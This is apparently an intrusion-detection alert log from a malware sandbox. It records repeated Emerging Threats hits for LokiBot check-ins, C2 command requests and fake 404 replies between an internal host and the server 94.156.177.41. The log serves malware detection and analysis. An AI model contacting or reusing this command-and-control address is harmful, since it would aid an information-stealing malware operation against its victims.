                                                    2024-11-20T11:08:36.517609+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.4180TCP
                                                    2024-11-20T11:08:36.517609+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.4180TCP
                                                    2024-11-20T11:08:36.527085+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249185TCP
                                                    2024-11-20T11:08:36.666299+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.4180TCP
                                                    2024-11-20T11:08:36.666299+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.4180TCP
                                                    2024-11-20T11:08:36.666299+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.4180TCP
                                                    2024-11-20T11:08:37.408604+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.4180TCP
                                                    2024-11-20T11:08:37.408604+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.4180TCP
                                                    2024-11-20T11:08:37.416957+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249186TCP
                                                    2024-11-20T11:08:37.600393+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.4180TCP
                                                    2024-11-20T11:08:37.600393+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.4180TCP
                                                    2024-11-20T11:08:37.600393+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.4180TCP
                                                    2024-11-20T11:08:38.490185+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.4180TCP
                                                    2024-11-20T11:08:38.490185+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.4180TCP
                                                    2024-11-20T11:08:38.495121+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249187TCP
                                                    2024-11-20T11:08:38.858062+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.4180TCP
                                                    2024-11-20T11:08:38.858062+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.4180TCP
                                                    2024-11-20T11:08:38.858062+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.4180TCP
                                                    2024-11-20T11:08:39.675088+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.4180TCP
                                                    2024-11-20T11:08:39.675088+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.4180TCP
                                                    2024-11-20T11:08:39.680093+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249188TCP
                                                    2024-11-20T11:08:39.816478+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.4180TCP
                                                    2024-11-20T11:08:39.816478+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.4180TCP
                                                    2024-11-20T11:08:39.816478+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.4180TCP
                                                    2024-11-20T11:08:40.550409+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.4180TCP
                                                    2024-11-20T11:08:40.550409+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.4180TCP
                                                    2024-11-20T11:08:40.555349+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249189TCP
                                                    2024-11-20T11:08:40.691052+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.4180TCP
                                                    2024-11-20T11:08:40.691052+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.4180TCP
                                                    2024-11-20T11:08:40.691052+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.4180TCP
                                                    2024-11-20T11:08:41.450674+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.4180TCP
                                                    2024-11-20T11:08:41.450674+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.4180TCP
                                                    2024-11-20T11:08:41.459392+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249190TCP
                                                    2024-11-20T11:08:41.600005+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.4180TCP
                                                    2024-11-20T11:08:41.600005+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.4180TCP
                                                    2024-11-20T11:08:41.600005+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.4180TCP
                                                    2024-11-20T11:08:42.331130+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.4180TCP
                                                    2024-11-20T11:08:42.331130+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.4180TCP
                                                    2024-11-20T11:08:42.336116+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249191TCP
                                                    2024-11-20T11:08:42.470301+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.4180TCP
                                                    2024-11-20T11:08:42.470301+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.4180TCP
                                                    2024-11-20T11:08:42.470301+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.4180TCP
                                                    2024-11-20T11:08:43.375730+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.4180TCP
                                                    2024-11-20T11:08:43.375730+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.4180TCP
                                                    2024-11-20T11:08:43.380664+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249192TCP
                                                    2024-11-20T11:08:43.523104+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.4180TCP
                                                    2024-11-20T11:08:43.523104+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.4180TCP
                                                    2024-11-20T11:08:43.523104+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.4180TCP
                                                    2024-11-20T11:08:44.416987+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.4180TCP
                                                    2024-11-20T11:08:44.416987+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.4180TCP
                                                    2024-11-20T11:08:44.421860+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249193TCP
                                                    2024-11-20T11:08:44.560565+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.4180TCP
                                                    2024-11-20T11:08:44.560565+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.4180TCP
                                                    2024-11-20T11:08:44.560565+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.4180TCP
                                                    2024-11-20T11:08:45.294525+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.4180TCP
                                                    2024-11-20T11:08:45.294525+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.4180TCP
                                                    2024-11-20T11:08:45.302895+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249194TCP
                                                    2024-11-20T11:08:45.440851+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.4180TCP
                                                    2024-11-20T11:08:45.440851+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.4180TCP
                                                    2024-11-20T11:08:45.440851+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.4180TCP
                                                    2024-11-20T11:08:46.174557+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.4180TCP
                                                    2024-11-20T11:08:46.174557+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.4180TCP
                                                    2024-11-20T11:08:46.182741+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249195TCP
                                                    2024-11-20T11:08:46.326513+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.4180TCP
                                                    2024-11-20T11:08:46.326513+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.4180TCP
                                                    2024-11-20T11:08:46.326513+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.4180TCP
                                                    2024-11-20T11:08:47.202696+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.4180TCP
                                                    2024-11-20T11:08:47.202696+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.4180TCP
                                                    2024-11-20T11:08:47.207849+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249196TCP
                                                    2024-11-20T11:08:47.362901+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.4180TCP
                                                    2024-11-20T11:08:47.362901+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.4180TCP
                                                    2024-11-20T11:08:47.362901+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.4180TCP
                                                    2024-11-20T11:08:48.276840+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.4180TCP
                                                    2024-11-20T11:08:48.276840+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.4180TCP
                                                    2024-11-20T11:08:48.285688+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249197TCP
                                                    2024-11-20T11:08:48.429055+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.4180TCP
                                                    2024-11-20T11:08:48.429055+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.4180TCP
                                                    2024-11-20T11:08:48.429055+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.4180TCP
                                                    2024-11-20T11:08:49.168632+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.4180TCP
                                                    2024-11-20T11:08:49.168632+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.4180TCP
                                                    2024-11-20T11:08:49.173575+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249198TCP
                                                    2024-11-20T11:08:49.331075+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.4180TCP
                                                    2024-11-20T11:08:49.331075+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.4180TCP
                                                    2024-11-20T11:08:49.331075+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.4180TCP
                                                    2024-11-20T11:08:50.089336+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.4180TCP
                                                    2024-11-20T11:08:50.089336+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.4180TCP
                                                    2024-11-20T11:08:50.099688+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249199TCP
                                                    2024-11-20T11:08:50.269289+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.4180TCP
                                                    2024-11-20T11:08:50.269289+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.4180TCP
                                                    2024-11-20T11:08:50.269289+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.4180TCP
                                                    2024-11-20T11:08:51.147665+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.4180TCP
                                                    2024-11-20T11:08:51.147665+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.4180TCP
                                                    2024-11-20T11:08:51.152685+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249200TCP
                                                    2024-11-20T11:08:51.465535+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.4180TCP
                                                    2024-11-20T11:08:51.465535+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.4180TCP
                                                    2024-11-20T11:08:51.465535+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.4180TCP
                                                    2024-11-20T11:08:52.239529+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.4180TCP
                                                    2024-11-20T11:08:52.239529+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.4180TCP
                                                    2024-11-20T11:08:52.244531+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249201TCP
                                                    2024-11-20T11:08:52.406148+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.4180TCP
                                                    2024-11-20T11:08:52.406148+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.4180TCP
                                                    2024-11-20T11:08:52.406148+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.4180TCP
                                                    2024-11-20T11:08:53.295076+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.4180TCP
                                                    2024-11-20T11:08:53.295076+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.4180TCP
                                                    2024-11-20T11:08:53.300040+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249202TCP
                                                    2024-11-20T11:08:53.449322+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.4180TCP
                                                    2024-11-20T11:08:53.449322+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.4180TCP
                                                    2024-11-20T11:08:53.449322+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.4180TCP
                                                    2024-11-20T11:08:54.189409+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.4180TCP
                                                    2024-11-20T11:08:54.189409+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.4180TCP
                                                    2024-11-20T11:08:54.194268+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249203TCP
                                                    2024-11-20T11:08:54.344079+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.4180TCP
                                                    2024-11-20T11:08:54.344079+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.4180TCP
                                                    2024-11-20T11:08:54.344079+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.4180TCP
                                                    2024-11-20T11:08:55.078799+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.4180TCP
                                                    2024-11-20T11:08:55.078799+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.4180TCP
                                                    2024-11-20T11:08:55.085830+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249204TCP
                                                    2024-11-20T11:08:55.469398+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.4180TCP
                                                    2024-11-20T11:08:55.469398+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.4180TCP
                                                    2024-11-20T11:08:55.469398+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.4180TCP
                                                    2024-11-20T11:08:56.212274+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.4180TCP
                                                    2024-11-20T11:08:56.212274+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.4180TCP
                                                    2024-11-20T11:08:56.219924+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249205TCP
                                                    2024-11-20T11:08:56.364430+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920694.156.177.4180TCP
                                                    2024-11-20T11:08:56.364430+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920694.156.177.4180TCP
                                                    2024-11-20T11:08:56.364430+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920694.156.177.4180TCP
                                                    2024-11-20T11:08:57.089307+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920694.156.177.4180TCP
                                                    2024-11-20T11:08:57.089307+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920694.156.177.4180TCP
                                                    2024-11-20T11:08:57.094558+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249206TCP
                                                    2024-11-20T11:08:57.229777+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920794.156.177.4180TCP
                                                    2024-11-20T11:08:57.229777+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920794.156.177.4180TCP
                                                    2024-11-20T11:08:57.229777+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920794.156.177.4180TCP
                                                    2024-11-20T11:08:57.994867+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920794.156.177.4180TCP
                                                    2024-11-20T11:08:57.994867+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920794.156.177.4180TCP
                                                    2024-11-20T11:08:58.002455+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249207TCP
                                                    2024-11-20T11:08:58.136926+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920894.156.177.4180TCP
                                                    2024-11-20T11:08:58.136926+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920894.156.177.4180TCP
                                                    2024-11-20T11:08:58.136926+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920894.156.177.4180TCP
                                                    2024-11-20T11:08:59.024610+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920894.156.177.4180TCP
                                                    2024-11-20T11:08:59.024610+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920894.156.177.4180TCP
                                                    2024-11-20T11:08:59.032141+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249208TCP
                                                    2024-11-20T11:08:59.170582+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920994.156.177.4180TCP
                                                    2024-11-20T11:08:59.170582+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920994.156.177.4180TCP
                                                    2024-11-20T11:08:59.170582+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920994.156.177.4180TCP
                                                    2024-11-20T11:09:00.048816+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920994.156.177.4180TCP
                                                    2024-11-20T11:09:00.048816+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920994.156.177.4180TCP
                                                    2024-11-20T11:09:00.055343+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249209TCP
                                                    2024-11-20T11:09:00.196735+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921094.156.177.4180TCP
                                                    2024-11-20T11:09:00.196735+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921094.156.177.4180TCP
                                                    2024-11-20T11:09:00.196735+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921094.156.177.4180TCP
                                                    2024-11-20T11:09:00.930538+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921094.156.177.4180TCP
                                                    2024-11-20T11:09:00.930538+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921094.156.177.4180TCP
                                                    2024-11-20T11:09:00.935498+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249210TCP
                                                    2024-11-20T11:09:01.097365+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921194.156.177.4180TCP
                                                    2024-11-20T11:09:01.097365+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921194.156.177.4180TCP
                                                    2024-11-20T11:09:01.097365+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921194.156.177.4180TCP
                                                    2024-11-20T11:09:01.830392+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921194.156.177.4180TCP
                                                    2024-11-20T11:09:01.830392+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921194.156.177.4180TCP
                                                    2024-11-20T11:09:01.835581+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249211TCP
                                                    2024-11-20T11:09:01.972570+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921294.156.177.4180TCP
                                                    2024-11-20T11:09:01.972570+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921294.156.177.4180TCP
                                                    2024-11-20T11:09:01.972570+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921294.156.177.4180TCP
                                                    2024-11-20T11:09:02.711590+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921294.156.177.4180TCP
                                                    2024-11-20T11:09:02.711590+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921294.156.177.4180TCP
                                                    2024-11-20T11:09:02.716563+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249212TCP
                                                    2024-11-20T11:09:02.864900+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921394.156.177.4180TCP
                                                    2024-11-20T11:09:02.864900+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921394.156.177.4180TCP
                                                    2024-11-20T11:09:02.864900+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921394.156.177.4180TCP
                                                    2024-11-20T11:09:03.597153+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921394.156.177.4180TCP
                                                    2024-11-20T11:09:03.597153+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921394.156.177.4180TCP
                                                    2024-11-20T11:09:03.602441+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249213TCP
                                                    2024-11-20T11:09:03.749038+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921494.156.177.4180TCP
                                                    2024-11-20T11:09:03.749038+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921494.156.177.4180TCP
                                                    2024-11-20T11:09:03.749038+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921494.156.177.4180TCP
                                                    2024-11-20T11:09:04.474795+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921494.156.177.4180TCP
                                                    2024-11-20T11:09:04.474795+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921494.156.177.4180TCP
                                                    2024-11-20T11:09:04.479679+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249214TCP
                                                    2024-11-20T11:09:04.621438+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921594.156.177.4180TCP
                                                    2024-11-20T11:09:04.621438+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921594.156.177.4180TCP
                                                    2024-11-20T11:09:04.621438+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921594.156.177.4180TCP
                                                    2024-11-20T11:09:05.407507+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921594.156.177.4180TCP
                                                    2024-11-20T11:09:05.407507+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921594.156.177.4180TCP
                                                    2024-11-20T11:09:05.416646+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249215TCP
                                                    2024-11-20T11:09:05.555632+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921694.156.177.4180TCP
                                                    2024-11-20T11:09:05.555632+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921694.156.177.4180TCP
                                                    2024-11-20T11:09:05.555632+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921694.156.177.4180TCP
                                                    2024-11-20T11:09:06.303457+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921694.156.177.4180TCP
                                                    2024-11-20T11:09:06.303457+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921694.156.177.4180TCP
                                                    2024-11-20T11:09:06.310839+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249216TCP
                                                    2024-11-20T11:09:06.505715+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921794.156.177.4180TCP
                                                    2024-11-20T11:09:06.505715+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921794.156.177.4180TCP
                                                    2024-11-20T11:09:06.505715+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921794.156.177.4180TCP
                                                    2024-11-20T11:09:07.233860+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921794.156.177.4180TCP
                                                    2024-11-20T11:09:07.233860+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921794.156.177.4180TCP
                                                    2024-11-20T11:09:07.240286+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249217TCP
                                                    2024-11-20T11:09:07.388227+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921894.156.177.4180TCP
                                                    2024-11-20T11:09:07.388227+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921894.156.177.4180TCP
                                                    2024-11-20T11:09:07.388227+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921894.156.177.4180TCP
                                                    2024-11-20T11:09:08.137816+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921894.156.177.4180TCP
                                                    2024-11-20T11:09:08.137816+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921894.156.177.4180TCP
                                                    2024-11-20T11:09:08.145630+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249218TCP
                                                    2024-11-20T11:09:08.631914+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921994.156.177.4180TCP
                                                    2024-11-20T11:09:08.631914+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921994.156.177.4180TCP
                                                    2024-11-20T11:09:08.631914+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921994.156.177.4180TCP
                                                    2024-11-20T11:09:09.364690+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921994.156.177.4180TCP
                                                    2024-11-20T11:09:09.364690+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921994.156.177.4180TCP
                                                    2024-11-20T11:09:09.369820+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249219TCP
                                                    2024-11-20T11:09:09.510263+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922094.156.177.4180TCP
                                                    2024-11-20T11:09:09.510263+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922094.156.177.4180TCP
                                                    2024-11-20T11:09:09.510263+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922094.156.177.4180TCP
                                                    2024-11-20T11:09:10.235026+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922094.156.177.4180TCP
                                                    2024-11-20T11:09:10.235026+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922094.156.177.4180TCP
                                                    2024-11-20T11:09:10.241617+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249220TCP
                                                    2024-11-20T11:09:10.381526+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922194.156.177.4180TCP
                                                    2024-11-20T11:09:10.381526+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922194.156.177.4180TCP
                                                    2024-11-20T11:09:10.381526+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922194.156.177.4180TCP
                                                    2024-11-20T11:09:11.115424+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922194.156.177.4180TCP
                                                    2024-11-20T11:09:11.115424+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922194.156.177.4180TCP
                                                    2024-11-20T11:09:11.120984+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249221TCP
                                                    2024-11-20T11:09:11.269627+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922294.156.177.4180TCP
                                                    2024-11-20T11:09:11.269627+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922294.156.177.4180TCP
                                                    2024-11-20T11:09:11.269627+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922294.156.177.4180TCP
                                                    2024-11-20T11:09:12.012535+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922294.156.177.4180TCP
